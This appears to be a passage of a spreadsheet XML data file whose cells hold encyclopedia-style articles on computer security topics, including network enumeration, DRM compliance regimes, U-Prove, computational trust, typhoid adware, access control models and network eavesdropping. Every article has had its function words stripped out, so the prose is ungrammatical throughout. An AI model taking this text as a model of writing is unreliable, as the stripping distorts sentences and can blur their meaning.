wide range valuable metadata. ni's value-add solutions traditionally based attracted attention industry analysts specialize market research. example, heavy reading includes companies deep packet inspection semi-annual market tracker. business intelligence data networks much technology synthesizes business application data variety sources business visibility better decision-making, technology correlates network traffic data variety data communication vehicles network visibility, enabling better cyber security services. with ongoing changes communications networks information exchanged, people longer linked exclusively physical subscriber lines. person communicate multiple ways ftp, webmail, voip, instant messaging, online chat, blogs, social networks different access points desktops, laptops mobile devices. provides means quickly identify, examine correlate interactions involving internet users, applications, protocols whether protocols tunneled follow model. technology enables global understanding network traffic applications need correlate information contacts whom, when, how, accesses database, when, information viewed. when combined traditional tools examine service quality customer care, creates powerful nexus subscriber network data. telecommunications telcos, internet service providers (isps) mobile network operators (mnos) increasing competitive pressures move smart pipe business models. cost savings revenue opportunities driving smart pipe strategies also apply network equipment providers, software vendors systems integrators serve industry. because captures detailed information hundreds applications cross mobile networks, provides required visibility analysis user demand create deliver differentiating services, well manage usage deployed. enabling technology smart pipe applications customer metrics especially important telecom companies understand consumer behaviors create personalized services. enables faster sophisticated audience measurement, user behavior analysis, customer segmentation, personalized services. real-time network metrics equally important companies deliver manage services. classifies protocols applications layers generates metadata communication sessions, correlates activity layers, applicable bandwidth resource optimization, qos, content-based billing, quality experience, voip fraud monitoring regulatory compliance. cloud computing economics deployment speed cloud computing fueling rapid adoption companies government agencies. among concerns, however, risks information security, e-discovery, regulatory compliance auditing. mitigates risks providing infrastructure service (iaas), platform service (paas) software service (saas) vendors real-time situational awareness network activity, critical transparency allay fears potential customers. vendor demonstrate hardened network security prevent data leakage data theft irrefutable audit trail network transaction communication content related customer's account, assuming compliance regulation standards. government extracts correlates information contacts whom, how, providing situational awareness lawful interception cyber security. real-time data capture, extraction analysis allow security specialists take preventive measures protect network assets real time complement post-mortem analysis attack. business because combines real-time network monitoring metadata extraction, enhances effectiveness applications database security, database auditing network protection. network visibility afforded also used build enhancements next-generation solutions network performance management, optimization, customer experience management, content filtering, internal billing networked applications. references</t>
  </si>
  <si>
    <t>Network enumeration</t>
  </si>
  <si>
    <t>network enumeration computing activity usernames info groups, shares, services networked computers retrieved. confused network mapping, retrieves information servers connected specific network operating system runs them. network enumeration discovery hosts devices network. network enumeration tends overt discovery protocols icmp snmp gather information. also scan various ports remote hosts looking well known services attempt identify function remote host. next stage enumeration fingerprint operating system remote host. software network enumerator network scanner computer program used retrieve usernames info groups, shares, services networked computers. this type program scans networks vulnerabilities security network. vulnerability security network, send report back hacker info exploit network glitch gain entry network malicious activities. ethical hackers often also information remove glitches strengthen network. malicious "black-hat") hackers can, entry network, security-sensitive information corrupt network making useless. network belonged company used network regular basis, company would lose function send information internally departments. network enumerators often used script kiddies ease use, well experienced hackers cooperation programs/manual lookups. also, whois queries, zone transfers, ping sweeps, traceroute performed. list network enumerators metasploit project nmap nessus openvas saint (software) security administrator tool analyzing networks zmap (software) also service scan references identifying applications fabian mihailowitsch</t>
  </si>
  <si>
    <t>Compliance and Robustness</t>
  </si>
  <si>
    <t>compliance robustness, sometimes abbreviated c&amp;r, refers legal structure regime underlying digital rights management (drm) system. many cases, regime given provided company sells solution. example, realnetworks helix microsoft windows media drm. however, standardised systems, fairly common separate body established regime. elements body legal entity establishes maintains regime. usually joint venture forum representation multiple companies, structured avoid accusations antitrust violations. nature business bodies generally composed manufacturers content owners, little direct representation consumer advocates. trust model body responsible ensuring chain trust, original content provider sufficiently satisfied content remain adequately secure throughout future links chain. this include export content system another. meet requirement, normal device planning receive drmed content required validate meets requirements, usually done using device certificate kind. issuance certificates stamp approval manufacturer device. devices verify trusted certificates, reasonably expect content passed remain secure. compliance rules many cases gaps, ambiguities options left open technical specification. regime must clarify exactly compliant device behave cases. example, compliance rule define types interfaces acceptable device, something technical specification never robustness rules controversial aspect agreement ensure device sufficiently robust resisting attacks. these rules require certain elements implemented hardware, secure cpus, code must available open source. manufacturers satisfy body meet requirement granted access certificates needed establish products trusted. "hook particular trick often used include patented technology, often part trust establishment mechanism. this means anyone wanting implement work others forced license patents. condition obtaining license follow rules regime itself. thus body 20-year window pursue legal measures "rogue" implementation grounds patent violation, rather rely dmca-style regulation provided relevant government. need license hook patents also impacts anyone thinking building product covered gpl. well-known example system employing hook common scrambling algorithm dvb-csa, though standardised etsi, includes patented elements licensed approved conditional access systems vendors agree maintain secrecy integrity algorithm chip designs. examples governed cmla regime dtcp-ip governed dtla regime references</t>
  </si>
  <si>
    <t>U-Prove</t>
  </si>
  <si>
    <t>u-prove free open-source technology accompanying user-centric identity management. underlying cryptographic protocols designed stefan brands developed credentica and, subsequently, microsoft. technology developed allow internet users disclose minimum amount personal data making electronic transactions reduce likelihood privacy violations. security expert bruce schneier praised cryptography behind u-prove. overview u-prove enables application developers reconcile seemingly conflicting security privacy objectives (including anonymity), allows digital identity claims efficiently tied tamper-resistant devices smart cards. application areas particular interest include cross-domain enterprise identity access management, e-government data sharing, electronic health records, anonymous electronic voting, policy-based digital rights management, social networking data portability, electronic payments. 2008, microsoft committed opening u-prove technology. first step, march 2010 company released cryptographic specification open-source implementation code part u-prove technology community technology preview microsoft's open specification promise. since then, several extensions released terms technology tested real-life applications. 2010, international association privacy professionals (iapp) honored u-prove 2010 privacy innovation award technology. microsoft also european identity award best innovation category u-prove european identity conference 2010.the u-prove crypto licensed apache license source code available github.microsoft also provides javascript implements client-side u-prove cryptographic specification. also blind signature zero-knowledge proof identity metasystem adam back's opensource credlib library implementing u-prove credentials references further reading stefan brands (2000). rethinking public infrastructures digital certificates; building privacy ed.). press. isbn 0-262-02491-8. christian paquin, greg zaverucha (2013). "u-prove cryptographic specification v1.1 (revision (pdf). microsoft corporation. {{cite journal}}: cite journal requires |journal= (help)cs1 maint: uses authors parameter (link) christian paquin (2013). "u-prove technology overview v1.1 (revision (pdf). microsoft corporation. {{cite journal}}: cite journal requires |journal= (help) external links u-prove credentica.com u-prove microsoft website uprove-csharp-sdk github</t>
  </si>
  <si>
    <t>Computational trust</t>
  </si>
  <si>
    <t>information security, computational trust generation trusted authorities user trust cryptography. centralised systems, security typically based authenticated identity external parties. rigid authentication mechanisms, public infrastructures (pkis) kerberos, allowed model extended distributed systems within closely collaborating domains within single administrative domain. during recent years, computer science moved centralised systems distributed computing. this evolution several implications security models, policies mechanisms needed protect users’ information resources increasingly interconnected computing infrastructure.identity-based security mechanisms cannot authorise operation without authenticating claiming entity. this means interaction occur unless parties known authentication frameworks. spontaneous interactions would, therefore, require single, trusted certificate authorities (cas). present context, considered since issues, thus unlikely establish reference standard near future. user wishes collaborate another party choose enabling security thereby disabling spontaneous collaboration, disabling security enabling spontaneous collaboration. fundamental mobile users devices authenticate autonomous without relying common authentication infrastructure. order face problem, need examine challenges introduced "global computing", term coined future global information society, identify impact security. cryptocurrencies, bitcoin, methods proof work (pow) achieve computational trust inside transaction network. history computational trust applies human notion trust digital world, seen malicious rather cooperative. expected benefits, according marsh al., result others' ability delegation, increased cooperation open less protected environment. research area computational mechanisms trust reputation virtual societies directed towards increased reliability performance digital communities.a trust-based decision specific domain multi-stage process. first step process consists identifying selecting proper input data, trust evidence. general, domain-specific derived analysis conducted application involved. next step, trust computation performed evidence produce trust values, means estimation trustworthiness entities particular domain. selection evidence subsequent trust computation informed notion trust defined trust model. finally, trust decision taken considering computed values exogenous factors, like disposition risk assessments. defining trust these concepts heightened relevance last decade computer science, particularly area distributed artificial intelligence. multi-agent system paradigm growth e-commerce increased interest trust reputation. fact, trust reputation systems recognized factors electronic commerce. these systems used intelligent software agents incentive decision-making, deciding whether honor contracts, mechanism search trustworthy exchange partners. particular, reputation used electronic markets trust-enforcing mechanism method avoid cheaters frauds.another area application concepts agent technology, teamwork cooperation. several definitions human notion trust proposed last years different domains sociology, psychology political business science. these definitions even change accordance application domain. example, romano's recent definition tries encompass previous work domains: trust subjective assessment another’s influence terms extent one’s perception quality significance another’s impact one’s outcomes given situation, one’s expectation openness inclination toward influence provide sense control potential outcomes situation. trust reputation social value. when someone trustworthy, person expected perform beneficial least suspicious assure others, high probability, good collaborations him. contrary, someone appears trustworthy, others refrain collaborating since lower level probability collaborations successful. trust particular level subjective probability agent assesses another agent group agents perform particular action, monitor action independently capacity ever able monitor context affects action. trust strongly connected confidence implies degrees uncertainty, hopefulness optimism. eventually, marsh addressed issue formalizing trust computational concept thesis. trust model based social psychological factors. trust model classification proposals appeared literature selection computational trust reputation models, represent good sample current research, presented.trust reputation analysed different points view applied many situations. next classification based considering peculiar characteristics models environment evolve. conceptual model trust reputation model characterized cognitivein models based cognitive approach, trust reputation made underlying beliefs function degree beliefs. mental states, lead trust another agent assign reputation, essential part model, well mental consequences decision relying another agent; neurologicalin neurological trust models based neurological theories interaction affective cognitive states modeled neurological level well using theories embodiment emotions. models trust dynamics relate experiences (external) sources, cognitive affective perspective. more specifically feeling emotion associated mental state, converging recursive body loops modeled. addition, based hebbian learning (for strength connections emotional responses) different adaptation processes introduced, inspired somatic marker hypothesis. game-theoreticaltrust reputation considered subjective probabilities individual expects individual perform given action welfare depends.in approach, trust reputation result mental state agent cognitive sense, result pragmatic game utility functions numerical aggregation past interactions. information sources possible sort models considering information sources used compute trust reputation values. traditional information sources direct experiences witness information, recent models started consider connection information sociological aspect agent's behavior. when model contains several information sources increase reliability results, conversely, increase complexity model. direct experiences direct experience relevant reliable information source trust/reputation model. types direct experiences recognizable: experience based direct interaction interlocutor; experience based observed interaction members community. witness information witness information, also called indirect information, comes experience members community. based direct experience data gathered others’ experience. witness information usually abundant complex trust reputation modelling. fact, introduces uncertainty agents manipulate hide parts information benefit. sociological information people belong community establish different types relations. each individual plays several roles society, influencing behavior interaction people. multi-agent system, plenty interactions, social relations among agents simplified reflection complex relations human counterparts. only trust reputation models adopt sociological information, using techniques like social network analysis. these methods study social relationships among individuals society emerged methods analysis social structures, methods specifically allow investigation relational aspects structures. prejudice bias prejudice another, though uncommon, mechanism influences trust reputation. according method, individual given properties particular group make recognisable member. these signs uniform, definite behavior, etc.as people today word, prejudice refers negative hostile attitude towards another social group, often racially defined. however, negative connotation revised applied agent communities. signs used computational trust reputations models usually ethical discussion, differently signs used human societies, like skin color gender. most literature cognitive social sciences claims humans exhibit non-rational, biased behavior respect trust. recently biased human trust models designed, analyzed validated empirical data. results show biased trust models able predict human trust significantly better unbiased trust models. discussion trust/reputation models relevant sources information considered trust reputation models presented before, direct experiences witness information. e-markets, sociological information almost non-existent and, order increase efficiency actual trust reputation models, considered. however, reason increase complexity models introducing trust evidence later, used environment possible realise capabilities. aggregation trust reputation evidence useful computational model increase complexity making general solution difficult. several models dependent characteristics environment possible solution could adaptive mechanisms modify combine different sources information given environment. trust reputation definitions presented several works give meaning concepts.there relation concepts considered depth: reputation concept helps build trust others. nowadays, game theory predominant paradigm considered design computational trust reputation models. likelihood, theory taken account significant number economists computer scientists, strong background game theory artificial intelligence techniques, working multi-agent e-commerce contexts. game theoretical models produce good results appropriate complexity agents, terms social relations interaction increases, becomes restrictive. exploration possibilities considered and, example, merging cognitive approaches game theoretical ones. apart that, trust evidence considered, well time-sensitive trust metrics. represent first step encourage improvement computational trust.an important issue modeling trust represented transferability trust judgements different agents. social scientists agree consider unqualified trust values transferable, pragmatic approach would conclude qualified trust judgments worth transferred decisions taken considering others’ opinion better ones taken isolation. authors investigated problem trust transferability open distributed environments, proposing translation mechanism able make information exchanged agent another accurate useful. evaluation trust models currently, commonly accepted evaluation framework benchmark would allow comparison models representative common conditions. game-theoretic approach direction proposed, configuration trust model optimized assuming attackers optimal attack strategies; allows next step compare expected utility different trust models. similarly, model-based analytical framework predicting effectiveness reputation mechanisms arbitrary attack models arbitrary system models proposed peer-to-peer systems. also risk risk management kerberos (protocol) public infrastructure references external links trmsim-wsn, trust reputation models simulator wireless sensor networks</t>
  </si>
  <si>
    <t>Network enclave</t>
  </si>
  <si>
    <t>network enclave section internal network subdivided rest network. purpose purpose network enclave limit internal access portion network. necessary resources differs general network surroundings. typically, network enclaves publicly accessible. internal accessibility restricted internal firewalls, vlans, network admissions control vpns. scenarios network enclaves consist standalone assets interact information systems networks. major difference demilitarized zone network enclave allows inbound outbound traffic access, firewall boundaries traversed. enclave, firewall boundaries traversed. enclave protection tools used provide protection within specific security domains. these mechanisms installed part intranet connect networks similar security requirements. within enclave established within enclave host publicly accessible systems. ideal design build separate network interface enclave perimeter firewall. traffic would routed firewall processing would still kept separate rest protected network. references</t>
  </si>
  <si>
    <t>Computer Law &amp; Security Review</t>
  </si>
  <si>
    <t>computer security review journal accessible wide range professional legal practitioners, businesses, academics, researchers, libraries organisations public private sectors, computer security review regularly covers: clsr briefing special emphasis uk/us developments european union update national news european jurisdictions pacific news column refereed practitioner academic papers topics 2.0, security, identity management, cards, rfid, interference privacy, internet law, telecoms regulation, online broadcasting, intellectual property, software law, e-commerce, outsourcing, data protection freedom information many topics.the journal's correspondent panel includes specialists security. each issue contains articles, case analysis current news information communications technology. special features high quality peer reviewed papers internationally renowned practitioner academic experts latest developments reported situ leading firms around world highly experienced respected editor correspondents panel online access volumes clsr embedded links primary sources contact details authors pool expertise collectively identify topics need examined. external links elsevier.com computer security review computer security review</t>
  </si>
  <si>
    <t>Typhoid adware</t>
  </si>
  <si>
    <t>typhoid adware type computer security threat uses man-in-the-middle attack inject advertising pages user visits using public network, like wi-fi hotspot. researchers university calgary identified issue, require affected computer adware installed order display advertisements computer. researchers said threat observed, described mechanism potential countermeasures. description environment threat work area non-encrypted wireless connection, wireless internet cafe wi-fi hotspots. typhoid adware would trick laptop recognize wireless provider inserts route wireless connection computer actual provider. after adware insert various advertisements data stream appear computer browsing session. even video stream, e.g., youtube modified. what more, adware infested computer whose owner would manifestations, affect neighboring ones. latter peculiarity named analogy typhoid mary (mary mallon), first identified person never experienced symptoms spread infection. time running antivirus software affected computer useless, since adware installed. implemented proof concept described article written march 2010, daniel medeiros nunes castro, eric lin, john aycock, wang.while typhoid adware variant well-known man-in-the-middle attack, researchers point number important issues, protection video content growing availability public wireless internet access well-monitored.researchers annoying advertisements iceberg. serious danger come from, e.g., promotions rogue antivirus software seemingly coming trusted source. defenses suggested countermeasures include: various approaches detection spoofing, rogue dhcp servers "man-in-the-middle" tricks network network administrators detection content modification detection timing anomalies using encrypted connections, using https browsing. encryption prevents mitm attacks succeeding; common browsers would display security warning adware infected computer would modified encrypted traffic transit uninfected victim. websites increasingly upgrading https, 2019, methods encrypting kind internet traffic, recursive dns.all approaches investigated earlier contexts. also countermeasure (computer) mobile virus piggybacking (internet access) threat (computer) vulnerability (computing) wireless security wireless intrusion prevention system references</t>
  </si>
  <si>
    <t>Computer Security Institute</t>
  </si>
  <si>
    <t>computer security institute (csi) professional membership organization serving practitioners information, network, computer-enabled physical security, level system administrator chief information security officer. founded 1974.csi used conduct conferences year annual computer security conference exhibition internet entrepreneur jimmy wales keynote speaker csi’s annual conference, held november 6–8, 2006, orlando, florida.csi perhaps best known annual csi/fbi computer crime security survey began conduct 1996 collaboration francisco federal bureau investigation's computer intrusion squad researchers robert smith school business university maryland. disappeared title study 2006 2007 reports. 15th annual survey, turned last, released 2011, available general public information week. staff, including richard power, testified expert witnesses united states senate committee hearings.in 2011, absorbed although mention appears wikipedia page. september 2014, original website returns file found error. snapshots website found wayback time machine. notes external links official website computer intrusion squad annual conference jimmy wales, keynote speaker, november 6–8, 2006, orlando, florida</t>
  </si>
  <si>
    <t>Computer Underground Digest</t>
  </si>
  <si>
    <t>computer underground digest (cud) weekly online newsletter early internet cultural, social, legal issues published gordon meyer thomas march 1990 march 2000. history meyer thomas criminal justice professors northern illinois university, intended newsletter cover topical social legal issues generated rise telecommunications internet. existed primarily email mailing list usenet, though archives later provided website. newsletter came prominence published legal commentary updates concerning "hacker crackdowns" federal indictments leonard rose craig neidorf phrack. published commentary membership subjects including legal social implications growing internet (and later web), book reviews topical publications, many off-topic postings readership. overtaken growth online forums web, ceased publication march, 2000. also phrack cult dead references external links computer underground digest textfiles.com</t>
  </si>
  <si>
    <t>Computer access control</t>
  </si>
  <si>
    <t>computer security, general access control includes identification, authorization, authentication, access approval, audit. narrow definition access control would cover access approval, whereby system makes decision grant reject access request already authenticated subject, based subject authorized access. authentication access control often combined single operation, access approved based successful authentication, based anonymous access token. authentication methods tokens include passwords, biometric scans, physical keys, electronic keys devices, hidden paths, social barriers, monitoring humans automated systems. software entities access-control model, entities perform actions system called subjects, entities representing resources access need controlled called objects (see also access control matrix). subjects objects considered software entities, rather human users: human users effect system software entities control.although systems equate subjects user ids, processes started user default authority, level control fine-grained enough satisfy principle least privilege, arguably responsible prevalence malware systems (see computer insecurity).in models, example object-capability model, software entity potentially subject object.as 2014, access-control models tend fall classes: based capabilities based access control lists (acls). capability-based model, holding unforge-able reference capability object, provides access object (roughly analogous possession one's house grants access one's house); access conveyed another party transmitting capability secure channel. acl-based model, subject's access object depends whether identity appears list associated object (roughly analogous bouncer private party would check name appears guest list); access conveyed editing list. (different systems variety different conventions regarding responsible editing list edited.)both capability-based acl-based models mechanisms allow access rights granted members group subjects (often group modeled subject). services access control systems provide essential services authorization, identification authentication (i&amp;a), access approval, accountability where: authorization specifies subject identification authentication ensure legitimate subjects system access approval grants access operations, association users resources allowed access, based authorization policy accountability identifies subject subjects associated user) authorization authorization involves defining access-rights subjects. authorization policy specifies operations subjects allowed execute within system.most modern operating systems implement authorization policies formal sets permissions variations extensions three basic types access: read (r): subject can: read file contents list directory contents write (w): subject change contents file directory following tasks: update delete rename execute (x): file program, subject cause program run. unix-style systems, "execute" permission doubles "traverse directory" permission granted directory.)these rights permissions implemented differently systems based discretionary access control (dac) mandatory access control (mac). identification authentication identification authentication (i&amp;a) process verifying identity bound entity makes assertion claim identity. process assumes initial validation identity, commonly called identity proofing. various methods identity proofing available, ranging in-person validation using government issued identification, anonymous methods allow claimant remain anonymous, known system return. method used identity proofing validation provide assurance level commensurate intended identity within system. subsequently, entity asserts identity together authenticator means validation. requirements identifier must unique within security domain.authenticators commonly based least following four factors: something know, password personal identification number (pin). this assumes owner account knows password needed access account. something have, smart card security token. this assumes owner account necessary smart card token needed unlock account. something are, fingerprint, voice, retina, iris characteristics. where are, example inside outside company firewall, proximity login location personal device. access approval access approval function actually grants rejects access operations.during access approval, system compares formal representation authorization policy access request, determine whether request shall granted rejected. moreover, access evaluation done online/ongoing. accountability accountability uses system components audit trails (records) logs, associate subject actions. information recorded sufficient subject controlling user. audit trails logs important detecting security violations re-creating security incidentsif regularly reviewing logs maintained secure consistent manner, admissible evidence.many systems generate automated reports, based certain predefined criteria thresholds, known clipping levels. example, clipping level generate report following: more three failed logon attempts given period attempt disabled user accountthese reports help system administrator security administrator easily identify possible break-in attempts. definition clipping level: disk's ability maintain magnetic properties hold content. high-quality level range 65–70%; quality 55%. access controls access control models sometimes categorized either discretionary non-discretionary. three widely recognized models discretionary access control (dac), mandatory access control (mac), role based access control (rbac). non-discretionary. discretionary access control discretionary access control (dac) policy determined owner object. owner decides allowed access object, privileges have. important concepts file data ownership: every object system owner. systems, object's initial owner subject caused created. access policy object determined owner. access rights permissions: these controls owner assign subjects specific resources.access controls discretionary acl-based capability-based access control systems. capability-based systems, usually explicit concept 'owner', creator object similar degree control access policy.) mandatory access control mandatory access control refers allowing access resource rules exist allow given user access resource. difficult manage, usually justified used protect highly sensitive information. examples include certain government military information. management often simplified (over required) information protected using hierarchical access control, implementing sensitivity labels. what makes method "mandatory" either rules sensitivity labels. sensitivity labels: system subjects objects must labels assigned them. subject's sensitivity label specifies level trust. object's sensitivity label specifies level trust required access. order access given object, subject must sensitivity level equal higher requested object. data import export: controlling import information systems export systems (including printers) critical function systems, must ensure sensitivity labels properly maintained implemented sensitive information appropriately protected times.two methods commonly used applying mandatory access control: rule-based label-based) access control: this type control defines specific conditions access requested object. mandatory access control system implements simple form rule-based access control determine whether access granted denied matching: object's sensitivity label subject's sensitivity label lattice-based access control: these used complex access control decisions involving multiple objects and/or subjects. lattice model mathematical structure defines greatest lower-bound least upper-bound values pair elements, subject object.few systems implement mac; xts-400 selinux examples systems role-based access control role-based access control (rbac) access policy determined system, owner. rbac used commercial applications also military systems, multi-level security requirements also exist. rbac differs allows users control access resources, rbac, access controlled system level, outside user's control. although rbac non-discretionary, distinguished primarily permissions handled. controls read write permissions based user's clearance level additional labels. rbac controls collections permissions include complex operations e-commerce transaction, simple read write. role rbac viewed permissions. three primary rules defined rbac: role assignment: subject execute transaction subject selected assigned suitable role. role authorization: subject's active role must authorized subject. with rule above, rule ensures users take roles authorized. transaction authorization: subject execute transaction transaction authorized subject's active role. with rules rule ensures users execute transactions authorized.additional constraints applied well, roles combined hierarchy higher-level roles subsume permissions owned lower-level sub-roles. most vendors offer rbac products. attribute-based access control attribute-based access control (abac), access granted based rights subject associated user authentication, based attributes user. user prove so-called claims attributes access control engine. attribute-based access control policy specifies claims need satisfied order grant access object. instance claim could "older 18". user prove claim granted access. users anonymous authentication identification strictly required. does, however, require means proving claims anonymously. this instance achieved using anonymous credentials. xacml (extensible access control markup language) standard attribute-based access control. xacml standardized january 2013. break-glass access control models traditionally, access purpose restricting access, thus access control models follow "default deny principle", i.e. specific access request explicitly allowed, denied. this behavior might conflict regular operations system. certain situations, humans willing take risk might involved violating access control policy, potential benefit achieved outweighs risk. this need especially visible health-care domain, denied access patient records cause death patient. break-glass (also called break-the-glass) mitigate allowing users override access control decision. break-glass either implemented access control specific manner (e.g. rbac), generic (i.e., independent underlying access control model). host-based access control (hbac) initialism hbac stands "host-based access control". also resource access control facility references</t>
  </si>
  <si>
    <t>Network eavesdropping</t>
  </si>
  <si>
    <t>network eavesdropping, also known eavesdropping attack, sniffing attack, snooping attack, method retrieves user information internet. this attack happens electronic devices like computers smartphones. this network attack typically happens usage unsecured networks, public wifi connections shared electronic devices. eavesdropping attacks network considered urgent threats industries rely collecting storing data. internet users eavesdropping internet improve information security. typical network eavesdropper called black-hat hacker considered low-level hacker simple network eavesdrop successfully. threat network eavesdroppers growing concern. research discussions brought public's eye, instance, types eavesdropping, open-source tools, commercial tools prevent eavesdropping. models network eavesdropping attempts built developed privacy increasingly valued. sections cases successful network eavesdropping attempts laws policies national security agency mentioned. some laws include electronic communications privacy foreign intelligence surveillance act. types attacks types network eavesdropping include intervening process decryption messages communication systems, attempting access documents stored network system, listening electronic devices. types include electronic performance monitoring control systems, keystroke logging, man-in-the-middle attacks, observing exit nodes network, skype type. electronic performance monitoring control systems (epmcss) electronic performance monitoring control systems used employees companies organizations collect, store, analyze, report actions performances employers working. beginning system used increase efficiency workers, instances unintentional eavesdropping occur, example, employees' casual phone calls conversations would recorded. keystroke logging keystroke logging program oversee writing process user. used analyze user's typing activities, keystroke logging provides detailed information activities like typing speed, pausing, deletion texts, behaviors. monitoring activities sounds keyboard strikes, message typed user translated. although keystroke logging systems explain reasons pauses deletion texts, allows attackers analyze text information. keystroke logging also used eye-tracking devices monitors movements user's eyes determine patterns user's typing actions used explain reasons pauses deletion texts. man-in-the-middle attack (mitm) man-in-the-middle attack active eavesdropping method intrudes network system. retrieve alter information sent parties without anyone noticing. attacker hijacks communication systems gains control transport data, cannot insert voice messages sound like actual users. attackers also create independent communications system users acting conversation users private.the “man-in-the-middle” also referred lurkers social context. lurker person rarely never posts anything online, person stays online observes users' actions. lurking valuable lets people gain knowledge users. however, like eavesdropping, lurking users' private information violates privacy social norms. observing exit nodes distributed networks including communication networks usually designed nodes enter exit network freely. however, poses danger attacks easily access system cause serious consequences, example, leakage user’s phone number credit card number. many anonymous network pathways, last node exiting network contain actual information sent users. exit nodes example. anonymous communication system allows users hide address. also layers encryption protect information sent users eavesdropping attempts trying observe network traffic. however, exit nodes used eavesdrop network traffic. last node network path flowing traffic, instance, exit nodes, acquire original information messages transmitted different users. skype type (s&amp;t) skype type (s&amp;t) keyboard acoustic eavesdropping attack takes advantage voice-over (voip). practical used many applications real world, require attackers close victim work leaked keystrokes instead every keystroke. with knowledge victim’s typing patterns, attackers gain 91.7% accuracy typed victim. different recording devices including laptop microphones, smartphones, headset microphones used attackers eavesdrop victim's style speed typing. especially dangerous attackers know language victim typing tools prevent eavesdropping attacks computer programs source code system shared public free commercial used prevent network eavesdropping. they often modified cater different network systems, tools specific task performs. case, advanced encryption standard-256, bro, chaosreader, commview, firewalls, security agencies, snort, tcptrace, wireshark tools address network security network eavesdropping. advanced encryption standard-256 (aes-256) cipher block chaining (cbc) mode ciphered messages hash-based message codes. aes-256 contains keys identifying actual user, represents standard used securing many layers internet. aes-256 used zoom phone apps help encrypt chat messages sent zoom users. feature used app, users encrypted chats app, notifications encrypted chat sent content involved. system detects network attackers abnormal traffic internet. emerged university california, berkeley detects invading network systems. system apply detection eavesdropping default, modified offline analyzing tool eavesdropping attacks. runs digital unix, freebsd, irix, sunos, solaris operating systems, implementation approximately 22,000 lines 1,900 lines bro. still process development real-world applications. chaosreader chaosreader simplified version many open-source eavesdropping tools. creates html pages content network intrusion detected. actions taken attack occurs information time, network location system wall user trying attack recorded. commview commview specific windows systems limits real-world applications specific system usage. captures network traffic eavesdropping attempts using packet analyzing decoding. firewalls firewall technology filters network traffic blocks malicious users attacking network system. prevents users intruding private networks. having firewall entrance network system requires user authentications allowing actions performed users. there different types firewall technologies applied different types networks. security agencies secure node identification agent mobile agent used distinguish secure neighbor nodes informs node monitoring system (nmoa). nmoa stays within nodes monitors energy exerted, receives information nodes including node location, signal strength, counts, more. detects nodes nearby moving range comparing signal strengths. nmoa signals secure node identification agent (snia) updates neighboring node information. node blackboard knowledge base reads updates agents, acting brain security system. node management agent created encryption inserted system. used protect often used autonomous underwater vehicles (auvs), underwater robots transmit data nodes. snort snort used many systems, offline mode using stream4. stream4 reassembles preprocessors another stream option. snort-reply patch feature often used reconstruct executions. currently developed cisco acts free network intrusion detection system. tcptrace tcptrace used analyze pcap-based network intercepts, packeting capture network application detects network traffic. important feature monitors eavesdropping attacks reconstruct captured streams. wireshark wireshark, also named ethereal, widely used open-source eavesdropping tool real world. most features ethereal packet-oriented contain reassembly option experiments tracking intrusion attempts. models attacks models built secure system information stored online specific towards certain systems, example, protecting existing documents, preventing attacks processing instant messages network, creating fake documents trace malicious users. beacon-bearing decoy documents documents containing fake private information made-up social security numbers, bank account numbers, passport information purposely posted server. these documents beacons triggered user attempts open them, alarms another site records time accessed documents address user. information collected beacons regularly sent exit nodes user caught malicious act. butterfly encryption scheme butterfly encryption scheme uses timestamps updates pseudorandom number generators (prng) seeds network system generate authentication keys parameters encrypted messages sent out. this scheme perform entities searching relatively cost efficient security scheme, work different systems simple design easy modify specific purposes. butterfly encryption scheme effective uses changing parameter unpredictable timestamp creates high-level security system. crypto phones (cfones) cfones model built protect voip communications. uses short authenticated strings (sas) protocol requires users exchange keys ensure network intruders system. this specific communication systems involve voice messages text messages. model, string given actual users, connect another user, strings exchanged match. another user tries invade system, string match, cfones blocks attackers entering network. this model specific preventing man-in-the-middle attacks. friendly-jamming schemes (dfj ofj) friendly-jamming schemes (dfj ofj) models decrease eavesdropping risk purposely interfering network unknown user near area protected area. models tested probability eavesdrop attacks testing environment, found lower probability attacks compared system friendly-jamming schemes installed. feature schemes models offer large coverage secure area protected eavesdroppers effectively. honey encryption scheme (he) honey encryption scheme used strengthen protection private information instant messaging systems, including whatsapp snapchat, well tracking eavesdropper’s information. contains fake similar plaintext decryption phase process instant messaging incorrect key. this makes messages eavesdropper trying decrypt gibberish messages. schemes used specific systems limited instant messaging systems, passwords, credit cards. however, applying systems still difficult task changes inside scheme made system. internet things framework (iot) internet things framework involved four layers security measures management layer, cloud layer, gateway layer, device layer. management layer handles mobile applications. cloud layer looks service resource management. acts access point users connect internet services. gateway layer manages packet filtering module. links endpoint network services, processes documents information, contains security tasks including authentication, authorization, encryption. main tasks gateway layer detect users perform filtering actual user malicious users. device layer looks gateway layer’s performance double-checks whether malicious users removed network, specifically, attestation mechanism measure end-point integrity removes nodes network necessary. cases network eavesdropping completely trusting network devices network companies risky. users devices oftentimes unaware threats internet choose ignore importance protecting personal information. this paves malicious hackers gain access private data users aware cases network eavesdropping discussed include alipay cloud computing. alipay private information user mobile payment apps, case, alipay, retrieved using hierarchical identification specific mobile payment apps. system first recognizes used traffic data, categorizes user’s distinct actions app, lastly distinguishes comprehensive steps within action. distinct actions mobile payment apps generalized groups including making payment, transfer money banks, scanning checks, looking previous records. classifying observing user’s specific steps within group actions, attacker intercepts network traffic using obtains private information users. strategies prevent incidents made fingerprint facial identification, email text confirmation actions performed app. cloud computing cloud computing computing model provides access many different configurable resources, including servers, storage, applications, services. nature cloud makes vulnerable security threats, attackers easily eavesdrop cloud. particularly, attacker simply identify data center virtual machine used cloud computing, retrieve information address domain names data center. becomes dangerous attacker gains access private cryptographic keys specific servers data stored cloud. example, amazon platform based seattle, washington, usa, risk issues used amazon service (aws) manage encryption keys. medical records sometimes users choose online responsible actions, including whether user take photo social security number send messaging app. however, data like medical records bank accounts stored network system companies also responsible securing user’s data. medical records patients stolen insurance companies, medical laboratories, advertising companies interests. information name, social security number, home address, email address, diagnosis history used track person. eavesdropping reports patient’s medical history illegal dangerous. deal network threats, many medical institutes using endpoint authentication, cryptographic protocols data encryption. related laws policies electronic communications privacy (ecpa) title electronic communications privacy (ecpa), states “federal crime engage wiretapping electronic eavesdropping; possess wiretapping electronic eavesdropping equipment; disclose information obtained illegal wiretapping electronic eavesdropping, disclose information secured court-ordered wiretapping electronic eavesdropping, obstruct justice.” federal state enforcement officials allowed intercept wire, oral, electronic communications court order issued, consent parties, malicious user trying access system. violated, criminal penalty, civil liability, administrative professional disciplinary action, exclusion evidence. general penalty five years imprisonment $250,000 individuals $500,000 organizations. damages created, $100 fine violation $10,000 total. foreign intelligence surveillance (fisa) foreign intelligence surveillance gives court orders “electronic surveillance, physical searches, installation, registers traps trace devices, orders disclose tangible 